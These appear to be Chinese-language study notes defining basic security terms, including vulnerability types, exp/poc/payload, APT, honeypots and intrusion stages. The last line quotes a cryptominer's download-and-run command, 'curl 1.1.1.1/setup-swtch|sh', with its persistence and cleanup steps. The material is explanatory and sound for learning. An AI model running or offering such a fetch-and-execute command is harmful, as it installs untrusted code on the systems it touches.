漏洞:安全漏洞是信息系统在生命周期的各个阶段(设计、实现、运维) 基于威胁分类:获取控制(RCE漏洞)、获取信息、拒绝服务
0day漏洞 通常指没有被公开的漏洞,通杀
1day漏洞 刚公布后的漏洞,或者公布后没有poc exp的漏洞,或者指刚公布一天的漏洞大部分通杀
nday漏洞 公布很久,流传很广的漏洞,少数没更新才能用。相对来说通杀性不高
攻击:利用网络信息系统存在漏洞和安全缺陷对系统和资源进行攻击。 区分:攻击、有效攻击、攻击成功
攻击是威胁的一种 威胁分为:威胁源和威胁行为
黑灰产
安全风险: 威胁利用脆弱性导致安全事件发生及其对组织造成的影响
安全事件: 人为原因、软硬件缺陷或故障、自然灾害等情况对网络信息系统或者其他的数据造成危害
入侵 通常是指具有熟练地编写、篡改和调试计算机机程序的技巧,并使用这些技巧来获取非法或时未授权的网络或文件访问,入侵进入公司内部的行为。
风险管理 管理威胁源 管理威胁行为 管理资产 管理资产脆弱性(口令) 减少影响
蜜罐管理威胁源
不要把鸡蛋放在一个篮子上;互为备份 后门 Webshell
exp:漏洞利用,如何利用攻击代码,使读者完全了解漏洞的机理和利用方法 poc:观点证明,证明漏洞真实实在 payload:有效负载,成功exploit后,真正在目标系统执行的代码或指令 永恒之蓝是exp
提权 明确目标、信息收集、制造机会、获取信任、权限提升(事实和共识)
APT:高级持续性威胁,利用先进的攻击手段特特定的信息进行攻击 行业、政府
蜜罐故意让攻击者攻击的目标,引诱黑客来攻击,所有攻击者入侵后,你可以知道他是如何得逞的,随时了解针对你的服务器发动的最新的攻击和漏洞
SEO推广利用各种搜索手段提高排行
暗网 Tor Browser
蜜罐收集样本,沙盒跑样本,分析行为
边界突破口:弱口令、RCE、0day上传、钓鱼 内网渗透:本机信息提取,扫描、爆破、横向移动
DMZ区域(连通互联网冗余遭受外界攻击)、核心区域()、三级业务区域
POST:URL User-agent:客户端信息 X-Forwarded-For:负载均衡代理设备代理的IP植入http头部 string:挖矿病毒curl 1.1.1.1/setup-swtch|sh、::添加启动项;删除策略;删除样本 |